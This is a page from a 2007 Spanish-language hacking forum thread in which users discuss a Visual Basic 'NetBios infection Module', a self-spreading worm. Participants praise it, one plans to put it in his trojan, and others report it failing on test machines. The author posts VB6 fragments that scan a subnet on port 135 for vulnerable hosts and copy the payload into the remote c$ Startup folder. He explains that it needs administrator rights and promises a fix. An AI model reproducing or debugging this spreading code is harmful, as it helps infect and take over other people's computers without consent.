elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  [Source] NetBios infection Module (ojo que es peligroso!)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 Ir Abajo Respuesta Imprimir
Autor Tema: [Source] NetBios infection Module (ojo que es peligroso!)  (Leído 13,534 veces)
wACtOr


Desconectado Desconectado

Mensajes: 461


Premio finalista diseño web elhacker.net


Ver Perfil
Re: [Source] NetBios infection Module (ojo que es peligroso!)
« Respuesta #10 en: 14 Julio 2007, 23:14 pm »

muy weno mad, eres tremendo. e hestado probandolo con mis 3 pcs, pero deben estar parcheados por que no crea el upodater.exe

por cierto, me puedes explicar a si por encima como usar los modulos socketmaster?

es que me gustaria incluirlos en mi troya, pero no se como funcionan.

gracias mad y otra vez, un EXCELENTE trabajo


En línea

Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.164


Cheats y Trainers para todos!


Ver Perfil WWW
Re: [Source] NetBios infection Module (ojo que es peligroso!)
« Respuesta #11 en: 14 Julio 2007, 23:45 pm »

muy weno mad, eres tremendo. e hestado probandolo con mis 3 pcs, pero deben estar parcheados por que no crea el upodater.exe

por cierto, me puedes explicar a si por encima como usar los modulos socketmaster?

es que me gustaria incluirlos en mi troya, pero no se como funcionan.

gracias mad y otra vez, un EXCELENTE trabajo

Tienes un grupo de trabajo creado con tus 3 PC''s?
Tienes firewall habilitado en alguno de tus PC''s
Están los 3 equipos dentro de la misma subred?
Tienes habilitado el servicio de Compartir archivos e impresoras en los 3 PC''s?

Lo de CSocketMaster es fácil, si te lo bajas de www.pscode.com trae un TXT explicándolo.

Saludos!!


En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: [Source] NetBios infection Module (ojo que es peligroso!)
« Respuesta #12 en: 14 Julio 2007, 23:54 pm »

Clap clap clap excelente Mad, esta vez te has salido  ;)
En línea

wACtOr


Desconectado Desconectado

Mensajes: 461


Premio finalista diseño web elhacker.net


Ver Perfil
Re: [Source] NetBios infection Module (ojo que es peligroso!)
« Respuesta #13 en: 15 Julio 2007, 00:15 am »

Citar
Tienes un grupo de trabajo creado con tus 3 PC''''s?
Tienes firewall habilitado en alguno de tus PC''''s
Están los 3 equipos dentro de la misma subred?
Tienes habilitado el servicio de Compartir archivos e impresoras en los 3 PC''''s?
Si a todo, como en windows xDD
si tengo todo ello hecho. lo de la subred es el mismo rango de ip no? me explico un poco : una subred seria por ejemplo 192.168.1.12, 192.168.1.13, etc.

si por ejemplo tuviera 192.168.0.12 y 192.168.1.13 no seria una subred. es asi??

Gracias.

PD aora me bajo de pscode a ver si saco algo en claro

En línea

Sancho.Mazorka


Desconectado Desconectado

Mensajes: 480


Gamer & Programador


Ver Perfil WWW
Re: [Source] NetBios infection Module (ojo que es peligroso!)
« Respuesta #14 en: 15 Julio 2007, 05:01 am »

Perfecto!!!  Sos un idolo con VB6, ojala que sigas asi (y que mejores  :xD)


Sancho.Mazorka    :¬¬
En línea

Ganador Xeon Web Server ! ! !    Sancho.Mazorka :D
http://foro.elhacker.net/index.php/topic,171903.75.html


Karcrack


Desconectado Desconectado

Mensajes: 2.419


Se siente observado ¬¬'


Ver Perfil
Re: [Source] NetBios infection Module (ojo que es peligroso!)
« Respuesta #15 en: 15 Julio 2007, 17:08 pm »

Esto me va a venir de perlas  :P.
Gran aporte MadAntrax  :o
En línea

Meg


Desconectado Desconectado

Mensajes: 462



Ver Perfil
Re: [Source] NetBios infection Module (ojo que es peligroso!)
« Respuesta #16 en: 15 Julio 2007, 17:53 pm »

Esta vez te has lucio  ;D, na enserio esta muy bien ese codigo... tanto estudiar en clase de redes sobre subneting y  de IP,s... y ahora ya se como puedo sacar buen provecho a todo eso  ;D la verdad es k no se me habia ocurrio xDD
« Última modificación: 15 Julio 2007, 17:56 pm por Meg » En línea

3k1n0x


Desconectado Desconectado

Mensajes: 324



Ver Perfil
Re: [Source] NetBios infection Module (ojo que es peligroso!)
« Respuesta #17 en: 18 Julio 2007, 05:36 am »

yo probe esto en una computadora conectada a otra en red lan, le probe con varias funciones de downloader haber si funka y nada no funka no se movio ni un pelito la otra pc, siempre chekeaba y nada q aparece el uptader.exe en ningun lado supongo q aparece en una carpeta de esas raras con %..., no funciono nada, a lo mejor era el firewall q se reia de mi :xD, q va.. no era el firewall xq lo desactive tambien hasta el antivirus y no funka, y eso de tener activado compartir impresoras ps si esta xq sencillamente mandas a imprimir algo desde esa pc y lo imprime en la pc (la otra) sera q sta mal el codigo¿ o ya hay parche¿ intentare de nuevo..
En línea

T3fL0n -> 3k1n0x
Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.164


Cheats y Trainers para todos!


Ver Perfil WWW
Re: [Source] NetBios infection Module (ojo que es peligroso!)
« Respuesta #18 en: 18 Julio 2007, 23:27 pm »

yo probe esto en una computadora conectada a otra en red lan, le probe con varias funciones de downloader haber si funka y nada no funka no se movio ni un pelito la otra pc, siempre chekeaba y nada q aparece el uptader.exe en ningun lado supongo q aparece en una carpeta de esas raras con %..., no funciono nada, a lo mejor era el firewall q se reia de mi :xD, q va.. no era el firewall xq lo desactive tambien hasta el antivirus y no funka, y eso de tener activado compartir impresoras ps si esta xq sencillamente mandas a imprimir algo desde esa pc y lo imprime en la pc (la otra) sera q sta mal el codigo¿ o ya hay parche¿ intentare de nuevo..

Uaaaa, ya sé porqué no te funciona. (Ha sido un fallo mio).

Código
  1. For i = 1 To 254                                            'Bucle desde X.X.X.1 hasta X.X.X.254
  2.        If WS.State <> sckClosed Then WS.CloseSck               'Si el Socket no está cerrado, lo cerramos para evitar errores.
  3.        DoEvents                                                'Esperamos...
  4.            WS.Connect SubNet & "." & i, 135                    'Nos conectamos a todos los Hosts de la LAN al puerto 135 TCP (NetBios)
  5.        [b]Sleep 500[/b]                                               'Esperamos 1/2 Segundo...
  6.        If WS.State = sckConnected And i <> MyHost Then         'Si el Hosts es vulnerable y el Host no es MiPC entonces...
  7.            AliveHosts = AliveHosts & i & ","                   '   añadimos el octeto del Host en el Array
  8.        End If                                                  'End If
  9.    Next i

Es por culpa del Sleep, esa función "duerme" todas las acciones del VB, incluido el IF que hay debajo, por eso en algunos equipos el scanning no funcionara del todo bien. Luego mejoro eso.

Otro error...

Código
  1. tmpIP = "\\" & SubNet & "." & tmpArray(i) & "\c$\Documents and Settings\All Users\Menú Inicio\Programas\Inicio"

Se copia en el perfil All Users, ese perfil está como solo lectura para todos los usuarios y escritura para los Administradores. Si el equipo desde donde lanzas el virus no es administrador de los otros equipos no logrará copiarse. En mi caso utilizo un dominio y lo lancé bajo los credenciales de Administrador del Dominio, por eso a mi me ha funcionado y a ti no. Lo he probado en un grupo de trabajo normal y no funciona xD

Este fin de semana me pongo y lo arreglo, ok? Lo siento y saludos!!
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
3k1n0x


Desconectado Desconectado

Mensajes: 324



Ver Perfil
Re: [Source] NetBios infection Module (ojo que es peligroso!)
« Respuesta #19 en: 27 Julio 2007, 21:10 pm »

alguien a hecho algo ? nose algo para ver si funka o mandrax o alguien sabe donde esta el fallo¿
En línea

T3fL0n -> 3k1n0x
Páginas: 1 [2] 3 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines